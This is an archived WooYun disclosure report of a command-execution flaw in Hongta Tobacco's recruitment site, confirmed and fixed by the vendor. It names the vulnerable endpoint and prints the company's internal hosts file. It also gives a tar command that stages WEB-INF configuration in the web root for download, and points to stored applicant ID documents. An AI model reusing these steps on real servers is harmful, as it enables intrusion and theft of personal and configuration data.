当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0208801

漏洞标题:红塔烟草某系统存在命令执行漏洞(大量应聘人员身份证件/简历/可威胁内网)

相关厂商:红塔烟草(集团)有限责任公司

漏洞作者: 路人甲

提交时间:2016-05-15 10:26

修复时间:2016-07-04 08:20

公开时间:2016-07-04 08:20

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-05-15: 细节已通知厂商并且等待厂商处理中
2016-05-20: 厂商已经确认,细节仅向厂商公开
2016-05-30: 细节向核心白帽子及相关领域专家公开
2016-06-09: 细节向普通白帽子公开
2016-06-19: 细节向实习白帽子公开
2016-07-04: 细节向公众公开

简要描述:

命令执行

详细说明:

红塔招聘

QQ截图20160514220652.png


http://zp.hongta.com/HRWEB/hr/recruitInfoParentAction/getNotices


QQ截图20160514220306.png


QQ截图20160514220255.png

漏洞证明:

★K8cmd-> cat /etc/hosts
====================================================================================================================================
127.0.0.1 localhost loopback
::1 localhost loopback
10.96.66.138    c1ep2vm138.hongta.com    c1ep2vm138
10.96.66.13   c1ep1vm13.hongta.com
10.96.66.22   c1ep1vm22.hongta.com
10.96.66.194  c1ep3vm194.hongta.com      c1ep3vm194
fd8c:215d:178e:1419:6bcd:13ff:fe60:d84d    c1ep2vm138-6.hongta.com    c1ep2vm138-6
fd8c:215d:178e:1419:290:fa71:fa37:f562    ntp28216.hongta.com    ntp28216
fd8c:215d:178e:1419:290:fa72:fa37:f562  IBMWorkloadDeployer
#bpm db server 
10.96.66.11    c1ep1vm11.hongta.com
10.96.66.12    c1ep1vm12.hongta.com
10.96.66.13    c1ep1vm13.hongta.com
10.96.66.22    c1ep1vm22.hongta.com
#bpm http server
10.96.66.9    c1ep1vm9.hongta.com
10.96.66.25    c1ep1vm25.hongta.com
#bpm was
10.96.66.26    c1ep1vm26.hongta.com
10.96.66.27    c1ep1vm27.hongta.com
10.96.66.31    c1ep1vm31.hongta.com
#bpm was console
10.96.66.24    c1ep1vm24.hongta.com
#ep was
10.96.66.32    c1ep1vm32.hongta.com
10.96.66.33    c1ep1vm33.hongta.com
10.96.66.34    c1ep1vm34.hongta.com
10.96.66.35    c1ep1vm35.hongta.com
#ep http server
10.96.66.36    c1ep1vm36.hongta.com
10.96.66.37    c1ep1vm37.hongta.com
#ep was console
10.96.66.38    c1ep1vm38.hongta.com
#tam tim server 
10.96.66.30    c1ep1vm30.hongta.com
10.96.66.40    c1ep1vm40.hongta.com
#ldap
10.96.66.29    c1ep1vm29.hongta.com
10.96.66.46    c1ep1vm46.hongta.com
10.96.66.47    c1ep1vm47.hongta.com
#org server
10.96.66.53    c1ep1vm53.hongta.com
#issue server
10.96.66.48    c1ep1vm48.hongta.com
#hr zp ihs
10.96.66.19    c1ep1vm19.hongta.com
#hr zp was
10.96.66.138    c1ep1vm138.hongta.com
10.96.66.195    c1ep1vm195.hongta.com
10.96.66.194    c1ep1vm194.hongta.com
#mobile was
10.96.66.130    c1ep1vm130.hongta.com
10.96.66.132    c1ep1vm132.hongta.com
10.96.66.133    c1ep1vm133.hongta.com
#mobile ihs
10.96.66.137    c1ep1vm137.hongta.com


QQ截图20160514231710.png


服务器内含大量应聘者证件信息

QQ截图20160514233044.png


QQ截图20160514233211.png


QQ截图20160514233355.png


QQ截图20160514233537.png


QQ截图20160514233658.png


QQ截图20160514233750.png


QQ截图20160514233829.png


QQ截图20160514233915.png


资源全都在这个目录

/opt/IBM/WebSphere/Profiles/HRWebProfile/installedApps/HRWebCell/HRWEB_war.ear/HRWEB.warhttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/


QQ截图20160514234048.png


QQ截图20160514234302.png


打个包,文件就全下来了
比如我想看看配置

tar -cvf /opt/IBM/WebSphere/Profiles/HRWebProfile/installedApps/HRWebCell/HRWEB_war.ear/HRWEB.war/wpp.tar.gz /opt/IBM/WebSphere/Profiles/HRWebProfile/installedApps/HRWebCell/HRWEB_war.ear/HRWEB.war/WEB-INF/


访问http://zp.hongta.com/HRWEB/wpp.tar.gz
就把配置什么down下来了,证件那些更是小意思

修复方案:

补丁,关闭debug模式

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2016-05-20 08:19

厂商回复:

已对该漏洞进行修复

最新状态:

暂无

漏洞评价:

评价